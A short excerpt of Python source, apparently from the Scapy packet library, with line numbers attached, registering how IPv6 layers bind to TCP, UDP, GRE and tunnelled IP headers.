4242bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP) 

4243bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP) 

4244bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP) 

4245bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6) 

4246bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) 

4247bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) 

4248bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)